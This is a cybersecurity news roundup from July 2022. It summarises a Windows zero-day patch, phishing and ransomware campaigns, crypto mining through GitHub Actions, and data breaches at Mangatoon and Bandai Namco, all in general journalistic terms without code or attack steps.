Microsoft patched a zero-day vulnerability in Windows
On July 12, as part of Patch Tuesday, Microsoft fixed 84 security flaws in its products, including a zero-day vulnerability which is already exploited by hackers.
CVE-2022-22047 (CVSS score 7.5) is a privilege escalation vulnerability in Windows. It exists due to a boundary error within the Microsoft Windows Client/Server Runtime Subsystem (CSRSS). An attacker with the access to the target system can run a specially crafted program to execute arbitrary code with SYSTEM privileges.
Microsoft warned about a large-scale AiTM phishing campaign
Over 10,000 organizations fell victims of a large-scale phishing campaign which began in September 2021. According to Microsoft, the threat actors targeted Office 365 users, even those who enabled a multi-factor authentication (MFA) on their accounts.
Using victims’ credentials and session cookies, the hackers hijacked mailboxes and performed business email compromise (BEC) attacks on other targets.
Hackers impersonate cybersecurity companies to distribute malware
Threat actors are impersonating prominent cybersecurity companies to trick victims into installing malware. The attack chain begins with victims receiving emails that appear to originate from cybersecurity companies. According to these emails, “cybersecurity professionals” have identified a malicious activity in the recipient’s network. At the final stage of the attack the unsuspecting victim installs a remote access trojan (RAT) that opens the door for further attacks.
Threat actors distributes new HavanaCrypt ransomware disguised as a Google Software Update
In an ongoing malicious campaign, the threat actors distribute a new ransomware strain disguised as a Google Software Update application.
HavanaCrypt is a .NET-based ransomware protected by Obfuscar, an open-source .NET obfuscator. The ransomware uses a Microsoft web hosting service IP address as its command-and-control (C&C) server to circumvent detection, which is not typical for ransomware.
Cybercriminals are abusing GitHub Actions and Azure virtual machines for cloud-based cryptocurrency mining
According to a Trend Micro’s recent report, a threat actors can leverage the runners or servers provided by GitHub to run an organization's pipelines and automation by maliciously downloading and installing crypto miners.
The researchers identified at least 1,000 repositories and over 550 code samples that abuse GitHub Actions (GHAs) for cryptocurrency mining. Similar variants of a YAML script containing commands to mine Monero were found in 11 repositories. All of them were connected to the same wallet, which means that there is the same actor behind the operation.
Ransomware gangs are making it easier to search for stolen files on their data leak websites
At least two ransomware operations and one extortion group have adopted a new strategy to force victims to pay for not leaking the stolen files. They added a search function to their leak sites to make it easier for potential buyers to find lots and specific details.
One of the ransomware gangs that adopted this new strategy is notorious BlackCat/AlphV. Another one is LockBit ransomware operation. The extortion gang that tried to adopt the new approach is Karakurt but their search option doesn’t work properly, at least for now.
Personal info on 23 million Mangatoon users leaked in a data breach
The threat actor has stolen data belonging to 23 million users of a comic reading platform Mangatoon. In May, they syphoned the database from Mangatoon’s Elasticsearch server that was protected with a weak password.
Last week, the data breach notification service Have I Been Pwned (HIBP) added 23 million Mangatoon accounts – names, email addresses, genders, social media account identities, auth tokens from social logins and salted MD5 password hashes – to their platform.
The threat actor is going to publish or sell the stolen database sometime in the future.
Bandai Namco videogame publishing giant fell a victim of a BlackCat ransomware operation
Notorious BlackCat/ AlphV ransomware gang claimed that they have successfully hacked Japanese videogame publisher Bandai Namco and syphoned the internal files. The legendary Dark Souls and Pac-Man publisher did confirm the incident that took place on July 3rd. According to the company’s statement, BlackCat gang compromised internal systems for offices in Asian regions, excluding Japan.
Scammers stole $8 million from Uniswap users in a large-scale phishing attack
Users of a decentralized cryptocurrency exchange Uniswap lost $8 million worth of Ethereum in a sophisticated phishing attack. Scammers tricked them into approving money transferring by announcing a fake giveaway.